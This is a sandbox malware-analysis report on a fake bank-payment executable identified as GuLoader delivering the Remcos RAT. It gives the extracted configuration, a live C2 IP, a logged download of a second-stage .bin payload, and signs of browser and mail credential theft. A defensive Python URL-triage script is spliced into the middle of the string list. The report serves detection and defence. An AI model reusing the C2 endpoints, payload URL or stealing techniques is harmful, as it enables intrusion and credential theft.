Windows Analysis Report
Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe

Overview

General Information

Sample name: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Analysis ID: 1520599
MD5: 97249feaaa2dd67af540e7615533294c
SHA1: dbfde83716b7253d7640d2ae3b45774337ce5931
SHA256: bd4499ee1845b2eeadc364b26f6e5891aaa699945a1125e6fcceedaac87f9090
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Malware configuration (Remcos):
{"Host:Port:Password": "102.165.14.28:26000:1102.165.14.28:27000:1102.165.14.28:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0V7E34", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.2950982254.00000000055B5000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: C1 3A FA F5 B6 00 28 79 DB B3 CE 24 8E 88 C9 AA 6E F4 34 42 F6 09 79 1F 6E 43 1E DD 9E 81 00 7E 43 39 10 9F 9E FC 59 27 F0 97 A0 E0 B7 89 78 10 3B 93 23 72 0F 76 E4 FD F7 24 57 48 E6 16 7B F4 B0 06 F7 BA BE CF A6 9D E0 FE 9E A9 07 E8 41 0C A9 96 53 1D 46 74 AA A1 A7 A7 39 82 7C C7 D1 54 59 57 2F 77 98 10 84 53 DD 9B C7 60 3D 75 2D D6 87 58 1B 84 3B DF D8 A7 97 EC 7F 38 55 37 70 B3 79 1E 49 D3 F1 D7 FB 90 9E 06 84 07 11 00 96 7C 27 59 75 10 1A 06 EC 89 99 1D CA 0F 02 26 E0 03 E0 05 C0 E2, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0V7E34\exepath

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T16:44:21.141834+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49736 | 102.165.14.28 | 26000 | TCP
2024-09-27T16:44:22.344265+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49738 | 102.165.14.28 | 26000 | TCP
2024-09-27T16:44:22.336649+0200 | 2803304 | 3 | Unknown Traffic | 192.168.11.20 | 49737 | 178.237.33.50 | 80 | TCP
2024-09-27T16:44:19.723915+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49735 | 102.165.14.28 | 80 | TCP

            AV Detection

Source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "102.165.14.28:26000:1102.165.14.28:27000:1102.165.14.28:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0V7E34", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; ReversingLabs: Detection: 36%
Source: Yara match; File source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Code function: 2_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,2_2_00404423
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Code function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Code function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Code function: 1_2_34F410F1 LdrInitializeThunk,LdrInitializeThunk,lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,1_2_34F410F1
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Code function: 1_2_34F46580 LdrInitializeThunk,FindFirstFileExA,1_2_34F46580
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Code function: 2_2_0040AE51 FindFirstFileW,FindNextFileW,2_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; Code function: 3_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,3_2_00407EF8

            Networking

Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49736 -> 102.165.14.28:26000
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49738 -> 102.165.14.28:26000
Source: Malware configuration extractor; URLs: 102.165.14.28
Source: global traffic; TCP traffic: 192.168.11.20:49736 -> 102.165.14.28:26000
Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
Source: Joe Sandbox View; IP Address: 178.237.33.50
Source: Joe Sandbox View; ASN Name: ASDETUKhttpwwwheficedcomGB
Source: Network traffic; Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49737 -> 178.237.33.50:80
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49735 -> 102.165.14.28:80
Source: global traffic; HTTP traffic detected: GET /dYaWuYrfJW197.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: 102.165.14.28; Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 102.165.14.28 (this entry appears 50 times in the report)
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008590542.00000000023B8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe; String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv equals www.facebook.com (Facebook)
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv equals www.yahoo.com (Yahoo)
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3009603810.00000000023A7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: me":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povare
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810121195.0000000034E20000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810121195.0000000034E20000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
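The DNS query to geoplugin.net above and the "String found in binary or memory" URL rows that follow are the network indicators an analyst has to triage by hand: the bare-IP download URL and the geoplugin.net lookup sit among dozens of OCSP, CRL and CA-repository URLs that come from X.509 certificates inside the harvested browser data (the dropped bhvF4C4.tmp) and are not infrastructure of the sample. The Python below is an added example, not part of the Joe Sandbox report. It parses rows of this format (the extraction fuses the source cell into the detection text, so the parser expects "...sdmpString found in binary or memory:"), strips the DER bytes the string carver appended to certificate URLs (the trailing "0", "0B", "07" are the next SEQUENCE tag 0x30 and its length byte), and sorts the URLs into tiers. The tier names, the hostname heuristics for PKI noise, and the reading of the bare-IP .bin URL as the downloader's second-stage fetch are the example's own assumptions; the sample rows are copied from this report.

```python
"""Triage the URL rows of a Joe Sandbox 'String found in binary or memory' list.

Added example, not part of the sandbox report. The rows in SAMPLE_LINES are
copied from this report; the tier names and heuristics are the example's own.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# The extracted report fuses the two table cells, so the source name runs
# straight into the detection text ("...sdmpString found in binary or memory:").
LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)String found in binary or memory:\s*(?P<string>.*)$")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Hostname labels and suffixes that mark certificate-infrastructure URLs (OCSP
# responders, CRL and CA-certificate repositories) carried inside X.509
# certificates; in a stealer's dumped browser data these are noise, not C2.
PKI_LABELS = {"ocsp", "ocsp2", "ocspx", "crl", "crl3", "crl4", "crls", "cdp",
              "cacerts", "certs", "certificates", "crt", "status", "secure"}
PKI_SUFFIXES = ("pki.goog", "ss2.us")
# A URI inside a DER-encoded extension is followed by the next SEQUENCE tag
# (0x30 = '0') and its length byte, which the string carver keeps: ".crl07", "com0B".
DER_TAIL_RE = re.compile(r"0.?$")

TIER_ORDER = ("payload-or-c2", "geolocation", "tooling", "other",
              "dropped-file-artifact", "pki-noise")

# Constructed sample: rows copied from this report (one URL each).
SAMPLE_LINES = """\
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://102.165.14.28/dYaWuYrfJW197.bin
Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0
Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0B
Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0u
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpgramFi
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/
Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
""".splitlines()


def parse_line(line):
    """Split one report row into (source, string); None for rows of another kind."""
    m = LINE_RE.match(line.strip())
    return (m.group("source"), m.group("string")) if m else None


def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_pki_url(url):
    parts = urlsplit(url)
    host = parts.hostname or ""
    return (host.split(".")[0] in PKI_LABELS
            or host.endswith(PKI_SUFFIXES)
            or parts.path.startswith("/CPS")
            or re.search(r"\.(crl|crt|cer|der)(0.?)?$", parts.path) is not None)


def classify(source, url):
    """Assign a triage tier; TIER_ORDER is the order an analyst should read them in."""
    host = urlsplit(url).hostname or ""
    if is_bare_ip(host):
        # A download URL on a bare IP in process memory: read here as the
        # downloader's stage-2 fetch (an interpretation, not a report finding).
        return "payload-or-c2"
    if host == "geoplugin.net":
        return "geolocation"            # victim geolocation lookup, as Remcos does
    if host.endswith("nirsoft.net"):
        return "tooling"                # embedded NirSoft recovery tool, not infrastructure
    if is_pki_url(url):
        return "pki-noise"
    if source.endswith(".dr"):
        return "dropped-file-artifact"  # e.g. the harvested browser data in bhvF4C4.tmp
    return "other"


def triage(lines):
    """Return {tier: {host: [unique URLs]}} for the URL rows in lines, noise tiers last."""
    buckets = {tier: {} for tier in TIER_ORDER}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        source, string = parsed
        for url in URL_RE.findall(string):
            tier = classify(source, url)
            # Only certificate URLs carry the DER tail; memory strings such as
            # "json.gpgramFi" keep their adjacent bytes and are grouped by host instead.
            clean = DER_TAIL_RE.sub("", url, count=1) if tier == "pki-noise" else url
            host = urlsplit(clean).hostname or ""
            urls = buckets[tier].setdefault(host, [])
            if clean not in urls:
                urls.append(clean)
    return {tier: {h: sorted(u) for h, u in sorted(hosts.items())}
            for tier, hosts in buckets.items() if hosts}


if __name__ == "__main__":
    for tier, hosts in triage(SAMPLE_LINES).items():
        print(f"[{tier}]")
        for host, urls in hosts.items():
            print(f"  {host}: {', '.join(urls)}")
```

Run as a script it prints the tiers for the sample rows; to use it on the full report, feed every row of the page to triage() and rows of other kinds (DNS queries, dropped files, API strings) are skipped by parse_line. The DER stripping is deliberately restricted to the pki-noise tier because it is a heuristic: a path that legitimately ends in a digit 0 would lose a character, and memory strings with trailing garbage are better de-duplicated by host than by guessing where the URL ends.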
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://102.165.14.28/dYaWuYrfJW197.bin
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://c.pki.goog/r/r1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://c.pki.goog/wr2/9UVbN0w5E6Y.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
